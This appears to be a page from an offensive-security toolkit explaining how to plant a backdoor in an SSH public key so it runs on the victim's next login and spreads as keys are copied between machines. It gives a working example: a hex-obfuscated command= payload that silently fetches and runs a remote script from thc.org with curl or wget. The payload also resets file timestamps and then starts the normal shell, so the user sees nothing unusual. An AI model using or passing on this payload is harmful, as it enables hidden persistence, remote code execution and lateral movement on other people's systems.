SSH Public Key Backdoor
Se
Generate a backdoor to hide in an ssh pubkey, e.g. in id_rsa.pub
or authorized_keys
. Executes on user’s next login.
Goal: Lateral movement by taking advantage of the tendency to copy ssh pubkeys between machines without checking content.
Add a backdoor string to the beginning of the pubkey.
Example
Add up to, but not including, ssh-ed255191...
no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);" ssh-ed25519 AAAAC3Nzblah....
Create your own backdoor
Usage: Edit between ---BEGIN BACKDOOR---
and ---END BACKDOOR---
. Commands:
Thanks to The Hacker’s Choice:
https://github.com/hackerschoice/ssh-key-backdoor
Technique details writeup:
https://blog.thc.org/infecting-ssh-public-keys-with-backdoors